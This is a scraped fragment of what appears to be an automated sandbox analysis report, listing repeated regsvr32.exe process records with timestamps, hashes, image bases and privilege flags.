Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:35 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:36 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:36 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x1b0000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
General |
---|
Start time: | 16:50:37 |
Start date: | 09/04/2021 |
Path: | C:\Windows\SysWOW64\regsvr32.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x7ff797770000 |
File size: | 20992 bytes |
MD5 hash: | 426E7499F6A7346F0410DEAD0805586B |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Disassembly |
---|
Code Analysis |
---|